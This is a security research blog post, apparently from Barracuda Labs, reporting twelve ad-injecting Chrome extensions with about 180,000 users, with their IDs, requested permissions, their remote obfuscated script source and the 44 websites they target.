More Spam Chrome Extensions Impacting 180K Users That Google Should Remove

Feb 03, 14 More Spam Chrome Extensions Impacting 180K Users That Google Should Remove

The Google Chrome web store has been in the spotlight recently for security risks that some of the tools are causing. Most recently, Google had to remove two Chrome extensions that could sneakily inject ads or malware on websites that would then infect unsuspecting users. There were more than 100,000 users who may have been infected before Google removed the two extensions.

At Barracuda Labs, we have monitored Chrome extension spam since Oct 2012, when we found several spamming extensions using Rovio’s famous puzzle games as the hook to quickly attract 82,000 users in a few days. In the last few weeks, we’ve detected some new interesting findings about another big spam campaign back in the Chrome web store.

In Summary, we found that 12 Chrome extensions injecting advertisements on 44 popular websites have been installed on more than 180,000 Chrome users, see Table 1.

Table 1: The List of Ads-injecting Chrome Extensions Still Live Till Jan-30-2014

Title

URL

Permissions  Required

01-08

#Users

01-15

#Users

01-23

#Users

01-30

#Users

logo quiz game kmkacofigdhiobalbhnklkknlbplmjpj Your data on all websites

75257

77744

81158

81994

counter strike cs portable dkbaopnghjggmdcmcoaloenaalokmili Your data on all websites

25680

26538

27549

26999

snail bob 2 jdjpjalodncbfhaghlafopfckkchenoi Your data on all websites, Your tabs and browsing activity

14983

15015

15840

15851

pac-man 80s njgeoadngonelhmacgjigochdijoofgn Your data on all websites, Your tabs and browsing activity

12161

12652

13389

13415

draw my thing hdijmiefiogighmeaonofemaclnfplil Your data on all websites

11117

11354

11961

12198

nyan cat fly bphkilcpnjgeegfnmifeifcmkgjngknk Your data on all websites, Your tabs and browsing activity

9044

9305

9857

9794

tetris flash cfhhalmjbofkjcgefcaejjdicdddpkkk Your data on all websites, Your tabs and browsing activity

8284

8558

8798

8945

bubble elements fcijkonhppildbjgkdaglmeoeemcldha Your data on all websites, Your tabs and browsing activity

5126

5174

5413

5384

angry halloween hd emfeoamofdcdeeaicodpfofpfefibaee Your data on all websites

2100

2127

2229

2268

smart soccer goalkeeper dfcjfcgpnnnkcppamjpobglgefaoecia Your data on all websites

1904

1994

2089

2080

pac-xon deluxe gghdghpgjbaddlnfaopaildhlahpegmp Your data on all websites, Your tabs and browsing activity

1788

1896

1968

2024

pong pdiilpimpenppmfcgjhnjkoebelagipj Your data on all websites, Your tabs and browsing activity

360

404

393

410

Total

167,804

172,761

180,644

181,362

 

Similarly to last time, all of these extensions are requiring the permission “Your data on all websites” so that the ads can be injected to any websites the users browse.

Meanwhile, all of these extensions are registered under the same developer organization: www.konplayer.com.

spam-extension-logo-quiz-1

Figure 1: one of the ads-injecting extensions from www.konplayer.com with 81,158 users

Different from our last findings, the extension codebase does not directly contain malicious Javascript code itself. Instead, it just uses a reference URL in the code, and hosts the Javascript on another domain: www.chromeadserver.com— which would trick unsuspecting users into thinking that Google owns the domain, but it does not.

spam-extension-js-code-1

Figure 2: Javascript code of the ads-injecting Chrome extension

After downloading this javascript code from the above URL, it is noticeable that the code started with the jQuery code (a javascript library useful for website design)– seems very benigal. But in the later part, obfuscated javascript began—very suspicious.

spam-obfuscated-js-code-1

Figure 3: Obfuscated javascript code adschrome.js served at chromeadserver.com

 After decoding these hexadecimal ASCII chars and put the whole story together, we found the following code and spent some time to understand it – looks familiar.

 spam-decoded-js-code-1

Figure 4: Obfuscated javascript code adschrome.js

A careful reading on this decoded program shows that it is the source of injecting ads banners on various positions of 44 popular websites. The list of these 44 websites follows:

Table 2: The List of Websites that will be injected with Ads by the Above Chrome Extensions

Website

Website

chrome.angrybirds.com www.myhappygames.com
heikki.angrybirds.com www.chromegamez.com
poppit.pogo.com www.gamesvarious.com
chrome.monsterdashgame.com msn.com
www.officewebgames.com yahoo.com
game2player.com youtube.com
www.flashgames101.com www.negane.com
games4chrome.com imdb.com
www.tarmogames.com myspace.com
www.gamesgator.com chrome.plantsvszombies.com
www.douchegames.com bejeweled.popcap.com
higamecenter.com evolvedonlinegames.com
chromegamebox.com www.webstoregames.com
kizi.com www.wardoom.com
home.sweetim.com www.sasquatchsurvivor.com
www.juegos.com www.realmofthemadgod.com
www.miniclip.com gameboysite.com
naclgames.com www.pinkemu.com
armorgames.com www.silverstoregames.com
chrometopgames.com disney.go.com
chrome.kingstonking.com 2048gamers.com
captainwebstore.com entanglement.gopherwoodstudios.com

Meanwhile, we notice that this code was also used in the ads-injecting Chrome extensions disclosed in our last report. They are probably the same group of hackers, except changing its name from www.playook.info to www.konplayer.com.

Google can surely remove these spam extensions from web store for now to protect any future victims, but what if they change their names again, or relocate and tweak the spam codes? Before Google provides a sustainable solution, Chrome users have to learn to protect themselves. As we always advised, Chrome users should be very careful if you intend to install Chrome extensions — even if it is from the Google Chrome web store. Use some common sense to judge whether you need to grant permissions to any extensions. If any of the permissions seem beyond the fence of what it should do, do not install it.

Once again, Google failed to protect Chrome users by allowing these spam extensions on its shelves, certainly something that users should consider when determining which products to use.